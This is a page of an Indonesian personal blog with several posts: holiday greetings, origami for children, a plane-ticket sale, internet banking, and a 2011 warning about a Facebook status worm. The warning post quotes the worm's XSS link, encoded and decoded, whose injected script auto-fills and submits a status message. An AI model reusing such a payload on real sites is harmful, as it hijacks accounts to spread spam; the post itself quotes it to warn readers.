jump to navigation

Inspirasi Ucapan selamat idul Fitri (Lebaran) Agustus 30, 2011

Posted by dedewinasis in Uncategorized.
Tags: , , , , , ,
3 comments

Meskipun lebaran terdapat perbedaan dalam pelaksanaannya, saya mengucapkan selamat lebaran kepada agan-agan semua mohon maaf lahir dan bathin, semoga kita semua kembali menjadi suci. Amin.

Nah bagi agan-agan semua yang ingin mengucapkan selamat lebaran namun bingung mau nulis apa?? nah berikut inspirasi untuk ucapan selamat lebaran yang bisa agan kirimkan melalui sms, chat, maupun BBM.

Berikut kumpulan sms ucapan selamat hari raya idul fitri 1432 H sebagai inspirasi :
Mata kadang salah melihat
Mulut kadang salah mengucap
Hati kadang salah menduga
Dengan niat tulus suci dan Ikhlas
Mohon maaf lahir dan batin (lebih…)

Mohon Maaf konten blog ini sedang di mutasi Juli 24, 2011

Posted by dedewinasis in Uncategorized.
2 comments

Kepada para pengunjung blog saya, https://dedewinasis.wordpress.com, saya mohon maaf konten blog ini sedang dalam mutasi ke http://dedewinasis.com . Oleh karena itu mohon maaf jika beberapa posting yang seharusnya bisa agan dapatkan dari google untuk kali ini belum tersedia. Terimakasih.

Dedewinasis.wordpress.com

Manfaat belajar origami bagi anak-anak Mei 10, 2011

Posted by dedewinasis in Uncategorized.
add a comment

Setelah di posting sebelumnya kita menguak tentang cara membuat origami dan beberapa origami fantastis yang sangat memukau, kali ini saya akan membahas manfaat belajar dan bermain origami bagi anak-anak.

Informasi ini saya dapatkan dari browsing di beberapa narasumber, yuuuk mari kita kuak manfaat origami 😀 Melihat manfaat origami yang banyak, berikut kita ulas manfaat origami menurut salah seorang yang pernah mengajar origami di Ashihara Syougakko (SD) di Toyohashi Aichi Jepang, Maya Hirai, seorang pakar origami.

Manfaat origami :

Melatih motorik halus pada anak sekaligus sebagai sarana bermain yang aman, murah, menyenangkan dan kaya manfaat.

-Lewat origami anak belajar membuat mainannya sendiri, sehingga menciptakan kepuasan dibanding dengan mainan yang sudah jadi dan dibeli di toko mainan.

-Membentuk sesuatu dari origami perlu melewati tahapan dan proses tahapan ini tak pelak mengajari anak untuk tekun, sabar serta disiplin untuk mendapatkan bentuk yang diinginkan.

-Lewat origami anak juga diajarkan untuk menciptakan sesuatu, berkarya dan membentuk model sehingga membantu anak memperluas ladang imajinasi mereka dengan bentukan origami yang dihasilkan.

-Apa yang dirasakan anak-anak ketika berhasil menciptakan sesuatu dari tangan mungil mereka? Kebanggaan dan kepuasan sudah pasti. Terlebih lagi anak belajar menghargai dan mengapresiasi karya lewat origami.

-Belajar membaca diagram/gambar, berpikir matematis serta perbandingan (proporsi) lewat bentuk-bentuk yang dibuat melalui origami adalah salah satu keuntungan lain dari mempelajari origami.

Semoga bermanfaat gaan !!!

Status di FB aneh-aneh? kena jebakan betmen deh! Maret 29, 2011

Posted by dedewinasis in Fenomena, Indonesia, komputer, life style, Uncategorized.
Tags: , , , ,
3 comments

Hari ini sepertinya lagi marak bangged status FB yang aneh dan cenderung norak. Hummm,,,,saya ga sengaja menemukan status milik teman yang tumben-tumbenan kok kaya begini…ternyata eh ternyata itu semacam produk hacking dan bukannya aplikasi FaceBook. Hasil saya browsing, saya temukan informasi berikut :

Barusan saya melihat status orang yang hampir sama. Awalnya saya kira ini memanfaatkan aplikasi facebook. Setelah dikopi paste dengan wget diterminal. Beginilah hasilnya :
http://tinyurl.com/sampahh berubah menjadi :

http://m.facebook.com/connect/prompt_feed.php?display=wap&user_message_prompt=’%3Cscript%3Ewindow.onload=function()document.forms%5B0%5D.message.value=’jangan%20salahin%20w%20kalo%20lo%20bakal%20ngakak%20ngeliat%20ni%20orang%20:D%20http://tinyurl.com/sampahh’;document.forms%5B0%5D.submit();%3C/script%3E

Huh …tinyurl-nya berfungsi untuk menyembunyikan javascriptnya :(
kalau kita decode jadilah seperti ini

http://m.facebook.com/connect/prompt_feed.php?display=wap&user_message_prompt='<script>window.onload=function(){document.forms[0].message.value='jangan salahin w kalo lo bakal ngakak ngeliat ni orang :Dhttp://tinyurl.com/sampahh';document.forms[0].submit();}</script>

informasi dari :http://ai23.wordpress.com/2011/03/29/hackingbahaya-url-pendek-fb/#comment-4267

sooo..harap hati-hati deh kalo liat status temen-temen anda seperti itu..hehehe. Dan bagi yang sudah terlanjur silakan di remove sajah !! trims (dedew:2011)

Selamat jalan 2010, selamat datang 2011 Desember 31, 2010

Posted by dedewinasis in Indonesia, life style, Uncategorized.
Tags: , , , ,
2 comments

Di setahun perjalanan hidup ini pasti kita menemui beberapa hal, baik dari hal yang positif maupun negatif. Tentunya agan-agan semua sudah melakukan beberapa koreksi maupun mencatat beberapa target yang belum tercapai di tahun ini. Nah, mari berhubung kita berada pada pintu terahir di 2010 dan mulai melangkah ke anak tangga menuju pintu depan 2011, kita tetapkan tujuan dan perbaikan dari koreksi yang sudah kita catat tadi. Selamat jalan 2010 dan selamat datang 2011!!

Doaku,” esok aku punya harapan besar…cita-cita besar, tujuan besar, keinginan besar, keinginan besar..semoga aku dapat mewujudkannya…amin..ya Allah..amin..”

Selain itu, harapan saya, saya dan keluarga saya diberi umur panjang, kesehatan dan rejeki yang halal, barokah, dijauhkan dari segala marabahaya, dijauhkan dari niat buruk siapapun, diberi hari-hari yang indah…dapat mewujudkan apa yang kami harapkan..amin amin…”

Selamat Tahun baru…semoga tahun 2011 ini menjadi tahun yang indah…tahun kebangkitan Indonesia…tahun bersatunya Indonesia, dan sepakbola kita menjadi lebih baik dari 2010.

dedewinasis.wordpress.com mohon maaf bulan ini kurang produktif.. Oktober 22, 2010

Posted by dedewinasis in Uncategorized.
Tags: , ,
add a comment

Setelah bulan Ramadhan yang suci dengan menjalani ibadah-ibadah, kemudian lebaran dan liburan produktifitas blog ini sepertinya sedang menurun. Namun pengunjung pun masih banyak. Tapi, perlu diperhatikan bahwa jumlah posting di bulan ini (oktober) sepertinya sangat-sangatlah jauh menurun. Hal ini memang sangat mencemaskan sekali. Nah, saya sebagai punggawa dan pemilik blog ini mengucapkan mohon maaf atas ketidakproduktifan bulan ini. Hal ini dikarenakan saya sedang sibuk beradaptasi dengan kondisi menjadi mahasiswa kembali semenjak awal bulan ini. Selain itu, saya disibukkan dengan pembuatan web untuk salah satu member http://www.oneklikpulsa.com. Oh iya….ternyata saya juga disibukkan dengan bisnis baru, yakni bermain dengan penjualan Blackberry baik secara grosir maupun ecer. hehehe.

TIKET JOGJA-JAKARTA 19 September 2010 DIJUAL September 19, 2010

Posted by dedewinasis in Indonesia, jogja, Uncategorized.
Tags: , , , , , , , ,
add a comment

Agan-agan semua….saya mau jual tiket Pesawat nih, Air Asia dari Jogjakarta tujuan Jakarta keberangkatan tanggal 19 September 2010, jam 16:30 WIB saya jual sesuai harga belinya saja deh…Rp. 350 ribu. Hal ini dikarenakan kakak saya tidak jadi berangkat ke Jakarta karena ada tugas mendadak di Jogjakarta, jadi beli tiket lagi lain hari. Mohon bantuan buat agan yang membutuhkan silakan kirim email ke saya….atau Call 08176019433. Ohya…untuk wanita yaaa!!!!! 😀

Selamat lebaran Maaf lahir batin September 12, 2010

Posted by dedewinasis in Uncategorized.
Tags: ,
4 comments

Terselip beberapa khilaf dalam setiap kalimat yang telah saya ucap maupun tulis dalam blog ini, dedewinasis.wordpress.com beserta saya (dedewinasis) mohon mengucapkan selamat lebaran, mohon maaf lahir dan batin. Semoga di hari yang fitri ini kita diberi ampunan dan kembali menjadi fitrah. Amin! Salam hangat blooger 😀

Origami Juli 8, 2010

Posted by dedewinasis in lucu dan unik, pengembangan diri, Uncategorized.
Tags: , ,
11 comments

Well saya teringat saat iseng-iseng perjalanan balik ke jakarta bersama teman-teman saya berusaha melipat kertas alias origami dan berusaha membuat menjadi sesuatu. Namun hasilnya apa yang terjadi? TIdak berhasil dan acak-acakan. Well, untuk beragi aja nih gan,,, berikut ada beberapa cara membuat mainan dari kertas dengan seni melipat kertas aliat yang disebut origami.

Seni melipat kertas atau origami adalah suatu seni yang berasal dari Cina yang diperkenalkan oleh seorang yang bernama Ts’ai Lun yang awal mulanya terbuat dari kertas yang berasal dari hancuran tumbuhan dan kain yang sudah tidak terpakai. Pada abad ke enam, origami ini dibawa ke Spanyol dan Jepang dan hingga kini sudah sangat populer di Indonesia. Seni ini sudah diajarkan melalui pendidikan di TK dan SD.

Di negara asalnya, origami ini juga dipakai saat mengajar anak-anak di TK. Anak-anak dengan tekun mengikuti panduan yang diberikan oleh sang guru sambil melakukan gerakan-gerakan melipat dan dapat mengembangkan daya cipta. Dan hal ini mampu mengembangkan sistem syaraf motorik. Selain itu, seni melipat kertas sendiri dapat mengajarkan hal lain, salah satunya adalah mengenal nama binatang, benda dan sebagainya.

Gambar diatas adalah cara membuat origami burung

Gambar diatas adalah cara membuat origami kelelawar

Gambar diatas adalah cara membuat origami jerapah

Semoga bermanfaat gaan…ada yang mau ajarin juniornya mungkin???

Jangan lupa baca ini juga :

1) Seni Origami yang penuh sensasi

2) Origami (2)

___________________________________________________________________________________________

Internet banking mudah dan praktis! Juli 6, 2010

Posted by dedewinasis in Uncategorized.
3 comments

Jaman yang semakin modern ini kemudahan demi kemudahan bermunculan untuk mempermudah urusan manusia. Syukurlah manusia diberikan akal dan pikiran sehingga dapat mengembangkan sesuatu. Salah satu hal yang akan saya bahas disini adalah kemudahan dalam urusan perbankan.

Juragan yang sering memakai pasti mengetahui apa itu internet banking. Internet banking adalah salah satu fasilitas yang ditawarkan oleh beberapa bank yang mana melalui internet juragan dapat mengakses rekening juragan. Mulai dari melihat saldo, mutasi rekening, dan sampai ke transfer uang bahkan melakukan pembayaran.

Membayar administrasi bulanan sebesar kurang lebih sampai dengan Rp 10.000;- menjadi harga yang wajar mengingat kemudahan itu sekarang sanga signifikan. Jumlah ATM yang banyak dan tersebar di beberapa lokasi strategis dan bahkan kini dengan adanya internet banking mempermudah orang untuk bertransaksi cukup di meja kerja maupun sms banking yang bisa dilakukan dimanapun.

Dengan adanya internet banking saya rasa merupakan revolusi yang amat bagus sekali bagi seorang pebisnis maupun perusahaan. Dari situ, kita bisa melihat masuknya dana dari siapa dan keluarnya dana ke siapa.

Bagaimana menurut juragan sekalian? ada komentar?